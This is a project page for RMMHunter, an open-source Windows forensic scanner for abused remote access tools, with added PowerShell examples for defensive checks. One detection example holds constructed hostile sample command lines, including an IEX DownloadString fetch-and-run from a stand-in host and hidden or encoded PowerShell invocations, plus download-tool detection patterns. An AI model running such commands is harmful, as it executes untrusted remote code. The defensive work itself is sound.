RMMHunter

Windows DFIR scanner for suspicious remote access tools, living-off-the-land traces, Watch Preview alerts, and endpoint trust signals.

Latest release: v0.3.4 (Evidence Noise Fix)
License: Apache-2.0
Code signing: unsigned beta

Device scan

Check this Windows device for unauthorized remote access tools and suspicious admin traces.


Cleaner evidence, fewer false alarms.

RMM Hunter now resolves startup shortcuts to their executable targets, treats plain local PowerShell policy bypass as lower-confidence context, and avoids flagging security-search patterns as real activity.

Startup review

Shortcut target signatures

Startup-folder .lnk files are resolved to their target executable where possible, and it is the target's signature that is checked, so signed tools such as Tailscale are not reported as unsigned just because the shortcut file itself carries no signature.
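The same check done by hand in PowerShell, as an added example that is not RMM Hunter's own collector: each Startup-folder .lnk is resolved to its target through the WScript.Shell COM object, and Get-AuthenticodeSignature is run on the target rather than on the shortcut. It assumes a stock Windows host where that COM object is registered; the output column names are chosen for the example.

```powershell
# Added example, not RMM Hunter code: resolve Startup-folder shortcuts to their
# target executables and sign-check the target, not the .lnk file.
$startupFolders = @(
    [Environment]::GetFolderPath('Startup')         # per-user Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

$shell = New-Object -ComObject WScript.Shell      # assumption: COM object available (stock Windows)

$results = foreach ($folder in $startupFolders) {
    foreach ($lnk in Get-ChildItem -LiteralPath $folder -Filter '*.lnk' -File -ErrorAction SilentlyContinue) {
        $shortcut = $shell.CreateShortcut($lnk.FullName)
        $target   = [Environment]::ExpandEnvironmentVariables($shortcut.TargetPath)

        if (-not $target -or -not (Test-Path -LiteralPath $target)) {
            # Dangling shortcut: nothing to sign-check, but still worth recording.
            [pscustomobject]@{ Shortcut = $lnk.FullName; Target = $target; Status = 'TargetMissing'; Signer = $null; Arguments = $shortcut.Arguments }
            continue
        }

        $sig = Get-AuthenticodeSignature -FilePath $target
        [pscustomobject]@{
            Shortcut  = $lnk.FullName
            Target    = $target
            Status    = $sig.Status                     # Valid, NotSigned, HashMismatch, ...
            Signer    = $sig.SignerCertificate.Subject
            Arguments = $shortcut.Arguments             # unusual arguments matter even for a signed target
        }
    }
}

# A signed target reached through an unsigned .lnk is the normal case; only
# unsigned, tampered or missing targets deserve a second look.
$results | Sort-Object Status | Format-Table Status, Signer, Target, Arguments -AutoSize
$results | Where-Object { $_.Status -ne 'Valid' }
```

Note the Arguments column: a signed interpreter such as powershell.exe launched from a Startup shortcut is "Valid" by signature, so the shortcut's argument string still needs to be read before the entry is dismissed.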

PowerShell

Better confidence labels

A plain -ExecutionPolicy Bypass -File invocation is kept as low-confidence context unless it appears together with encoded content, downloads, hidden windows, WMI activity, Defender events, or new persistence.

Security review

Searches stay searches

Local searches for strings such as EncodedCommand or DownloadString no longer become findings by themselves when they are clearly part of a review command.
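A small rule function that applies both notes above (the low-confidence label for a bare execution-policy bypass, and the rule that a search for suspicious strings is not itself suspicious), written for this page as an added example and not taken from RMM Hunter's rule set. The regexes, the confidence names and the sample command lines are all constructed for the example.

```powershell
# Added example, not RMM Hunter code: label PowerShell command lines by confidence.
function Get-PowerShellConfidence {
    param([Parameter(Mandatory)][string]$CommandLine)
    $cl = $CommandLine

    # A review command that merely searches logs for suspicious tokens is not activity.
    if ($cl -match '(?i)\b(Select-String|findstr|grep)\b' -and
        $cl -match '(?i)(EncodedCommand|DownloadString|FromBase64String)') {
        return [pscustomobject]@{ Confidence = 'none'; Reason = 'security review search'; CommandLine = $cl }
    }

    # Companions that turn a plain bypass into a real finding (patterns are illustrative).
    $strong = [ordered]@{
        'encoded content' = '(?i)(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String)'
        'download'        = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Net\.WebClient|BitsTransfer)'
        'hidden window'   = '(?i)-w(indowstyle)?\s+hidden'
        'WMI'             = '(?i)(Get-WmiObject|Get-CimInstance|Invoke-WmiMethod|Win32_Process|\bwmic\b)'
    }
    $hits   = @($strong.Keys | Where-Object { $cl -match $strong[$_] })
    $bypass = ($cl -match '(?i)-ex(ecutionpolicy)?\s+bypass') -and ($cl -match '(?i)-f(ile)?\s')

    if ($hits.Count -gt 0) {
        $why = if ($bypass) { 'bypass with ' + ($hits -join ', ') } else { $hits -join ', ' }
        return [pscustomobject]@{ Confidence = 'high'; Reason = $why; CommandLine = $cl }
    }
    if ($bypass) {
        return [pscustomobject]@{ Confidence = 'low'; Reason = 'plain ExecutionPolicy Bypass -File (context only)'; CommandLine = $cl }
    }
    [pscustomobject]@{ Confidence = 'none'; Reason = 'no rule matched'; CommandLine = $cl }
}

# Constructed sample command lines (not real process events).
$samples = @(
    'powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Vendor\maintenance.ps1',
    'powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1',
    "powershell.exe -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    'powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAA=',
    'powershell.exe -Command Select-String -Path C:\Logs\ps.txt -Pattern "EncodedCommand|DownloadString"'
)
$samples | ForEach-Object { Get-PowerShellConfidence -CommandLine $_ } | Format-Table Confidence, Reason -AutoSize
```

Run against the samples, the first line is labelled low (bypass only), the second and third high (hidden window, download), the fourth high (encoded content without any bypass), and the last none because it is a Select-String review command. The search exception is checked first on purpose: otherwise the review command's own pattern string would match the download and encoded-content rules.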

Defender

Remediation context is clearer

When Defender reports that a malware action completed successfully, RMM Hunter marks the evidence with stronger confidence while still keeping it in the timeline for review.
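How a practitioner can pull the same Defender context by hand, as an added example that is not RMM Hunter's collector: read the Defender Operational log for detection and action events, parse the "Label: value" lines in each message, and mark a completed action as the strongest form of the finding. The event ID to outcome mapping is the standard Defender Operational one (1116 detected, 1117 action taken, 1118/1119 action failed, plus the older 1006/1007/1008 set); the 30-day window and the confidence labels are assumptions for the example.

```powershell
# Added example, not RMM Hunter code: Defender detection and remediation events.
$idLabels = @{
    1006 = 'detected'; 1007 = 'action completed'; 1008 = 'action failed'
    1116 = 'detected'; 1117 = 'action completed'; 1118 = 'action failed'
    1119 = 'action critically failed'
}

function Get-DefenderField {
    param([string]$Message, [string]$Label)
    # Defender messages carry lines such as "Name: Trojan:Win32/..." and "Action: Quarantine".
    if ($Message -match "(?m)^\s*$([regex]::Escape($Label))\s*:\s*(.+?)\s*$") { $Matches[1] } else { $null }
}

$findings = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = [int[]]$idLabels.Keys
    StartTime = (Get-Date).AddDays(-30)          # assumption: 30-day lookback
} -ErrorAction SilentlyContinue | ForEach-Object {
    $outcome = $idLabels[[int]$_.Id]
    $errDesc = Get-DefenderField $_.Message 'Error description'
    # A named threat is High on its own; a successfully completed action is the
    # strongest form because Defender confirms both the threat and what it did.
    $confidence = if ($outcome -eq 'action completed' -and $errDesc -match 'completed successfully') { 'high (remediation confirmed)' }
                  elseif ($outcome -match '^action (critically )?failed') { 'high (remediation failed, artifact may remain)' }
                  else { 'high' }
    [pscustomobject]@{
        Time       = $_.TimeCreated
        EventId    = $_.Id
        Outcome    = $outcome
        Threat     = Get-DefenderField $_.Message 'Name'
        Path       = Get-DefenderField $_.Message 'Path'
        Action     = Get-DefenderField $_.Message 'Action'
        Severity   = 'High'
        Confidence = $confidence
    }
}

$findings | Sort-Object Time | Format-Table Time, EventId, Outcome, Threat, Action, Confidence -AutoSize
```

Keep the failed-action rows in the timeline as well: a detection whose remediation failed is the case where the file may still be on disk and is the one most worth checking against the service and persistence findings.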

It reads what Windows already knows.

RMM Hunter does not probe networks or exploit systems. It collects local artifacts, groups related signals, and explains why each finding deserves review.

01  Installed apps

Find known remote access tools through uninstall registry entries.
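The uninstall-registry sweep done by hand, as an added example that is not RMM Hunter's signature set: read the three Uninstall hives (64-bit, 32-bit and per-user) and match DisplayName and Publisher against a short name list. The product-name list is an illustrative assumption for the example, not RMM Hunter's rules.

```powershell
# Added example, not RMM Hunter code: find remote access products via Uninstall keys.
# Illustrative name list (assumption); a real rule set is larger and versioned.
$rmmNames = @('AnyDesk', 'TeamViewer', 'ScreenConnect', 'ConnectWise Control', 'Splashtop',
              'Atera', 'NinjaOne', 'NinjaRMM', 'Syncro', 'LogMeIn', 'RustDesk', 'Supremo',
              'GoTo Resolve', 'Zoho Assist', 'UltraViewer', 'Ammyy', 'Action1', 'Remote Utilities')
$pattern = ($rmmNames | ForEach-Object { [regex]::Escape($_) }) -join '|'

$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'              # 64-bit installs
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall'  # 32-bit installs
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'              # per-user installs (no admin needed)
)

$installed = foreach ($key in $uninstallKeys) {
    Get-ChildItem -Path $key -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $p.DisplayName) { return }            # skip entries with no display name
        [pscustomobject]@{
            DisplayName     = $p.DisplayName
            Publisher       = $p.Publisher
            InstallDate     = $p.InstallDate           # yyyyMMdd when present; keep raw for the timeline
            InstallLocation = $p.InstallLocation
            UninstallString = $p.UninstallString
            Hive            = $key.Split(':')[0]
            Key             = $_.PSChildName
        }
    }
}

$hits = $installed | Where-Object { "$($_.DisplayName) $($_.Publisher)" -match "(?i)($pattern)" }
$hits | Sort-Object DisplayName | Format-Table DisplayName, Publisher, InstallDate, Hive, InstallLocation -AutoSize
```

The HKCU hive is the one most often skipped: several remote access tools install per-user without elevation, which is exactly the path a support-scam session takes, and those entries never appear under HKLM.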

02  Services

Review service binary paths, recent service creation (System log event ID 7045), code signatures, and binaries that live in user-writable locations.
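The service review written out in PowerShell, as an added example rather than RMM Hunter's collector: take each service's binary path apart, sign-check the binary, flag binaries under user-writable trees, and pull the last week of 7045 "a service was installed" events. The 7-day window and the list of writable roots are assumptions chosen for the example.

```powershell
# Added example, not RMM Hunter code: service binaries, signatures, writable paths, 7045 events.
function Get-ServiceBinaryPath([string]$PathName) {
    # PathName may be quoted, may carry arguments, may be a svchost -k line.
    if (-not $PathName) { return $null }
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(\S+\.exe)') { return $Matches[1] }
    ($PathName -split '\s+')[0]
}

# Assumption: trees an ordinary user can write to; tune for the environment.
$writableRoots = @($env:TEMP, $env:ProgramData, "$env:SystemDrive\Users", "$env:SystemDrive\Temp", "$env:windir\Temp") |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') }

$services = Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    $bin = if ($bin) { [Environment]::ExpandEnvironmentVariables($bin) }
    $sig = if ($bin -and (Test-Path -LiteralPath $bin)) { Get-AuthenticodeSignature -FilePath $bin } else { $null }
    [pscustomobject]@{
        Name         = $_.Name
        State        = $_.State
        StartMode    = $_.StartMode
        Binary       = $bin
        SigStatus    = if ($sig) { $sig.Status } else { 'Unknown' }   # Unknown = path missing or not parseable
        Signer       = $sig.SignerCertificate.Subject
        UserWritable = [bool]($writableRoots | Where-Object { $bin -and $bin.StartsWith($_, 'OrdinalIgnoreCase') })
    }
}

# Services worth a second look: unsigned, tamper-signed, unresolvable, or under a writable tree.
$services | Where-Object { $_.UserWritable -or $_.SigStatus -ne 'Valid' } |
    Format-Table Name, State, StartMode, SigStatus, UserWritable, Binary -AutoSize

# Recent service installations from the System log (event ID 7045).
# Property order in 7045: ServiceName, ImagePath, ServiceType, StartType, AccountName.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = $_.Properties[0].Value
            ImagePath   = $_.Properties[1].Value
            StartType   = $_.Properties[3].Value
            Account     = $_.Properties[4].Value
        }
    } | Sort-Object Time | Format-Table -AutoSize
```

The 7045 list and the live service list are deliberately kept separate: a service that was installed and then removed still shows in 7045 but no longer appears in Win32_Service, and that gap is itself a finding.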

03  Tasks and startup

Surface persistence points that could restart tools after reboot.

04  PowerShell and WMI

Look for encoded commands, hidden windows, download behavior, and WMI traces.

05  RMM logs and KAPE

Import vendor traces and optional KAPE output for deeper DFIR context.

06  Defender and trust

Review detections, remediation events, protection changes, code-signing trust, and trusted root certificates.

Designed for the first hour of uncertainty.

Use Scan for a careful snapshot, then Watch when the device needs short-term alerting while context is still being confirmed.

Case timeline

  1. Scan this device

    Collect local Windows artifacts and event logs where available.

  2. Review grouped findings

    See exact paths, services, task actions, event excerpts, and confidence labels.

  3. Turn on Watch when needed

    Use local alert history, the built-in Discord webhook guide, test alerts, and policy-gated response actions for short-term monitoring.

  4. Decide with context

    Export JSON or PDF, confirm with the device owner or IT provider, then remediate with a documented timeline.

High

Defender malware or remediation event observed

Defender reported a named threat and action. RMM Hunter preserves the event context so the next step is evidence-led.

Medium

Recent remote access installer or script

An installer in Downloads or Temp may be benign, but it needs an owner, purpose, and timeline.

Low

Routine Defender configuration change

Low-severity context stays in the timeline without inflating the verdict by itself.

Powerful triage. Guarded response.

Security tools have to be boring in the right places. RMM Hunter is local-first, transparent, and approval-required by default.

No automatic deletion

Files are preserved by default. Preview response actions require policy approval and every action is recorded.

Local reports

Reports stay on the device unless the user exports or shares them. Optional AI requires a user-provided provider key.

Open source

Rules, collectors, release workflow, docs, and verification instructions are public on GitHub.

Release verification

GitHub releases include SHA256 checksums, a manifest, a verification guide, and Authenticode status. Current beta binaries are unsigned unless a release manifest says SignPath signing is valid.
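Checking a downloaded release the way that paragraph describes, as an added example and not RMM Hunter's release tooling: compare the file's SHA256 against the checksum file and report Authenticode status on the binary. The file names and the checksum-line format ("hash  filename", as produced by sha256sum) are assumptions; substitute the names from the actual GitHub release.

```powershell
# Added example, not RMM Hunter release tooling: verify a release download.
$Download     = 'C:\Downloads\RMMHunter-release.zip'   # placeholder name
$ChecksumFile = 'C:\Downloads\SHA256SUMS.txt'          # placeholder name
$Binary       = 'C:\Downloads\RMMHunter\RMMHunter.exe' # placeholder: the extracted executable

$name     = Split-Path -Path $Download -Leaf
$expected = $null
foreach ($line in Get-Content -Path $ChecksumFile) {
    # Assumed format: "<64 hex>  <filename>", with an optional leading * for binary mode.
    if ($line -match '^\s*([0-9a-fA-F]{64})\s+\*?(.+?)\s*$' -and (Split-Path -Path $Matches[2] -Leaf) -eq $name) {
        $expected = $Matches[1].ToLowerInvariant()
        break
    }
}
if (-not $expected) { throw "No checksum entry for $name in $ChecksumFile" }

$actual = (Get-FileHash -Path $Download -Algorithm SHA256).Hash.ToLowerInvariant()
if ($actual -ne $expected) { throw "SHA256 mismatch for ${name}: expected $expected, got $actual" }
"SHA256 OK: $name"

# Mark-of-the-Web check: a browser download carries a Zone.Identifier stream;
# its absence on a fresh download is unusual and worth noting.
$motw = Get-Item -Path $Download -Stream Zone.Identifier -ErrorAction SilentlyContinue
"Mark-of-the-Web present: $([bool]$motw)"

# Authenticode applies to the PE, not the zip. Per the release notes, expect
# NotSigned on current beta builds unless the manifest says SignPath signing is valid.
$sig = Get-AuthenticodeSignature -FilePath $Binary
$signer = if ($sig.SignerCertificate) { ' (' + $sig.SignerCertificate.Subject + ')' } else { '' }
"Authenticode: $($sig.Status)$signer"
```

A checksum match only proves the download equals what the release page published; it does not prove who published it. That is why the manifest's signing status still matters even when the hash is correct.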

What it does

  • Detects suspicious RMM and breach traces on Windows endpoints.
  • Shows exact artifacts, timestamps, paths, event IDs, and finding reasons.
  • Exports JSON, PDF, and optional mapped detection output.
  • Adds Watch Preview alerts, checkpoints, and guarded response actions.
  • Explains next steps without changing the deterministic verdict.

What it does not do

  • Does not exploit systems or bypass security controls.
  • Does not scan the network or reach into other devices.
  • Does not automatically delete files, stop services, isolate the host, or uninstall tools.
  • Does not claim a clean result is proof that a system is safe.

What RMM Hunter is, in plain terms.

This section is intentionally direct so search engines, AI assistants, analysts, and small business owners can understand the project without guessing from marketing copy.

Primary category

Open-source Windows endpoint DFIR triage and RMM abuse review tool.

Best-fit searches

RMM abuse scanner, remote access tool detection, AnyDesk evidence, TeamViewer investigation, ScreenConnect triage, Windows DFIR scanner, and KAPE RMM import.

Evidence sources

Installed apps, services, event ID 7045, scheduled tasks, startup entries, PowerShell logs, WMI activity, process events, Defender events, vendor logs, KAPE output, code-signing trust, and trusted roots.

Verdict model

RMM Hunter produces deterministic clean, needs_review, and high_risk verdicts from local rules. Optional AI explanations cannot change the verdict.

Safety boundary

It does not exploit systems, scan networks, delete files, stop services, uninstall tools, bypass controls, or upload scan reports by default.

Common questions before running a scanner.

Is RMM Hunter an antivirus?

No. It is a triage and evidence organizer for suspicious remote access tooling, living-off-the-land traces, Watch Preview alerts, and Windows trust-health signals. It should complement, not replace, endpoint protection and incident response.

Does a clean result prove the device is safe?

No. A clean result means the collected sources did not contain the specific signals RMM Hunter checks. Missing logs, disabled auditing, deleted artifacts, or unsupported tools can limit coverage.

Can it help after a support scam?

Yes. It can help preserve and organize evidence such as remote access tools, services, downloads, PowerShell activity, Defender events, vendor logs, and Watch Preview changes after a suspicious support session.

Where should sensitive reports be shared?

Do not post raw reports publicly. Reports can contain usernames, file paths, command lines, service names, event excerpts, webhook context, and local security configuration details.

Download RMM Hunter.

Use it as a careful second opinion after suspicious remote support, RMM abuse, or endpoint alerts. Version 0.3.4 reduces noisy evidence from signed startup shortcuts and local PowerShell review commands.